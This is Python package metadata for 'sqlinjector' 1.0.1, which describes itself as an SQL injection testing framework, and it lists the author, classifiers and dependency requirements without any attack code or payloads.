Metadata-Version: 2.4
Name: sqlinjector
Version: 1.0.1
Summary: A professional SQL injection testing framework for security professionals
Home-page: https://github.com/abderrahimghazali/sqlinjector
Author: AbderrahimGHAZALI
Author-email: ghazali.abderrahim1@gmail.com
Keywords: security,sql-injection,penetration-testing,vulnerability-scanner
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Information Technology
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Topic :: Security
Classifier: Topic :: Software Development :: Testing
Classifier: Environment :: Console
Requires-Python: >=3.8
Requires-Dist: requests>=2.28.0
Requires-Dist: aiohttp>=3.8.0
Requires-Dist: click>=8.0.0
Requires-Dist: colorama>=0.4.6
Requires-Dist: beautifulsoup4>=4.11.0
Requires-Dist: urllib3>=1.26.0
Requires-Dist: pydantic>=2.0.0
Requires-Dist: jinja2>=3.0.0
Requires-Dist: tabulate>=0.9.0
Requires-Dist: pyyaml>=6.0
Provides-Extra: dev
Requires-Dist: pytest>=7.0.0; extra == "dev"
Requires-Dist: pytest-asyncio>=0.21.0; extra == "dev"
Requires-Dist: pytest-cov>=4.0.0; extra == "dev"
Requires-Dist: black>=22.0.0; extra == "dev"
Requires-Dist: isort>=5.0.0; extra == "dev"
Requires-Dist: flake8>=5.0.0; extra == "dev"
Requires-Dist: mypy>=1.0.0; extra == "dev"
Provides-Extra: advanced
Requires-Dist: selenium>=4.0.0; extra == "advanced"
Requires-Dist: playwright>=1.30.0; extra == "advanced"
Dynamic: author
Dynamic: author-email
Dynamic: classifier
Dynamic: description
Dynamic: description-content-type
Dynamic: home-page
Dynamic: keywords
Dynamic: provides-extra
Dynamic: requires-dist
Dynamic: requires-python
Dynamic: summary
